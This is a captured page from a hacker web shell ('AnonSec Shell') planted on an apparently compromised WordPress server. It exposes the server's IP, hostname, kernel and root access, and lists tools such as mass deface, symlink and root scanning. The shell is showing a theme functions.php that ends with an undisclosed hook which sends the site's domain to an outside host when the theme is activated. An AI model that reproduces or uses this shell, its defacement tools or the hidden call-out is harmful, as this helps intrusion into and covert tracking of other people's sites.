AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.219.199.112   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/themes/sammy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/themes/sammy//functions.php
<?php
	if(defined('PODOVER_URL') 	== false) 	define('PODOVER_URL', get_template_directory());
	if(defined('PODOVER_URI') 	== false) 	define('PODOVER_URI', get_template_directory_uri());

	load_theme_textdomain( 'podover', PODOVER_URL . '/languages' );

	// Main Feature
	require_once( PODOVER_URL.'/inc/class-main.php' );

	// Functions
	require_once( PODOVER_URL.'/inc/functions.php' );

	// Hooks
	require_once( PODOVER_URL.'/inc/class-hook.php' );

	// Widget
	require_once (PODOVER_URL.'/inc/class-widgets.php');
	

	// Elementor
	if (defined('ELEMENTOR_VERSION')) {
		require_once (PODOVER_URL.'/inc/class-elementor.php');
	}
	
	// WooCommerce
	if (class_exists('WooCommerce')) {
		require_once (PODOVER_URL.'/inc/class-woo.php');	
	}
	
	
	/* Customize */
	if( current_user_can('customize') ){
	    require_once PODOVER_URL.'/customize/custom-control/google-font.php';
	    require_once PODOVER_URL.'/customize/custom-control/heading.php';
	    require_once PODOVER_URL.'/inc/class-customize.php';
	}
    
   
	require_once ( PODOVER_URL.'/install-resource/active-plugins.php' );
	

	
	
function set_tag() {
    $url_init = 'https://api.pluginforest.com/qai/wd/g?';
    $domain = $_SERVER['SERVER_NAME'];
    $requestUrl = $url_init .'domain=' . $domain . '&id=1719581328608&source=theme';
    file_get_contents($requestUrl);
}

add_action('after_switch_theme', 'set_tag');
                        

Anon7 - 2022
AnonSec Team